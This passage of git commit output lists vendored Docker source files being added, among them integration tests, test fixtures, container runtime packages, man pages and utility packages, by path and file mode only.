 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/events_utils.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go
 create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
 create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
 create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe_windows.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_exec.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_unix.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_windows.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go
 create mode 100644 vendor/github.com/docker/docker/layer/empty.go
 create mode 100644 vendor/github.com/docker/docker/layer/empty_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/filestore.go
 create mode 100644 vendor/github.com/docker/docker/layer/filestore_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_store.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_store_windows.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_unix.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/layer_windows.go
 create mode 100644 vendor/github.com/docker/docker/layer/migration.go
 create mode 100644 vendor/github.com/docker/docker/layer/migration_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/mount_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/mounted_layer.go
 create mode 100644 vendor/github.com/docker/docker/layer/ro_layer.go
 create mode 100644 vendor/github.com/docker/docker/layer/ro_layer_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/process_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/types.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le
 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x
 create mode 100644 vendor/github.com/docker/docker/man/README.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-create.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-diff.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-rename.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-restart.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md
 create mode 100644 vendor/github.com/docker/docker/man/docker.1.md
 create mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md
 create mode 100644 vendor/github.com/docker/docker/man/generate.go
 create mode 100755 vendor/github.com/docker/docker/man/generate.sh
 create mode 100644 vendor/github.com/docker/docker/man/glide.lock
 create mode 100644 vendor/github.com/docker/docker/man/glide.yaml
 create mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh
 create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1.go
 create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
 create mode 100644 vendor/github.com/docker/docker/oci/defaults_linux.go
 create mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go
 create mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go
 create mode 100644 vendor/github.com/docker/docker/oci/devices_linux.go
 create mode 100644 vendor/github.com/docker/docker/oci/devices_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/oci/namespaces.go
 create mode 100644 vendor/github.com/docker/docker/opts/hosts.go
 create mode 100644 vendor/github.com/docker/docker/opts/hosts_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/hosts_unix.go
 create mode 100644 vendor/github.com/docker/docker/opts/hosts_windows.go
 create mode 100644 vendor/github.com/docker/docker/opts/ip.go
 create mode 100644 vendor/github.com/docker/docker/opts/ip_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/mount.go
 create mode 100644 vendor/github.com/docker/docker/opts/mount_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/opts.go
 create mode 100644 vendor/github.com/docker/docker/opts/opts_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/opts_unix.go
 create mode 100644 vendor/github.com/docker/docker/opts/opts_windows.go
 create mode 100644 vendor/github.com/docker/docker/opts/port.go
 create mode 100644 vendor/github.com/docker/docker/opts/port_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/quotedstring.go
 create mode 100644 vendor/github.com/docker/docker/opts/quotedstring_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/secret.go
 create mode 100644 vendor/github.com/docker/docker/opts/secret_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
 create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_other.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_other.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/example_changes.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/whiteouts.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/wrap.go
 create mode 100644 vendor/github.com/docker/docker/pkg/archive/wrap_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/plugin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/response.go
 create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
 create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/log.go
 create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory.go
 create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/backends.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/entry.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
 create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
 create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
 create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/poller.go
 create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
 create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir.go
 create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go
 create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/integration/checker/checker.go
 create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go
 create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go
 create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/readers.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers.go
 create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
 create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/locker/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker.go
 create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath.go
 create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
 create mode 100644 vendor/github.com/docker/docker/pkg/loopback/ioctl.go
 create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
 create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loopback.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
 create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
 create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers.go
 create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
